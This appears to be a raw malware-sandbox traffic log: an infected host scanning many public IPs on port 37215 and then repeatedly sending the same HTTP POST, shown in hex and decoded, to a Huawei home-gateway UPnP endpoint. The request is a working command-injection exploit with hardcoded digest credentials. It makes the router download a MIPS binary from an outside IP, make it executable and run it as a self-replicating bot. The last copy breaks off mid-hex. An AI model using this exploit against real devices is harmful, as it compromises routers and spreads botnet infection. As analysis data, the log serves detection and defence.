          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.201.194.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.149.102.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.73.15.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.168.191.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.28.203.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.3.246.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.190.146.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 84.179.2.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.116.186.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.173.92.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.188.108.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 115.54.5.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.121.173.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 90.198.128.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.142.26.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 202.246.13.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.149.69.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.72.75.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.70.0.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.106.15.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 126.94.108.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.87.79.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.83.202.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.135.167.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 144.165.137.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 119.3.250.207:37215
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 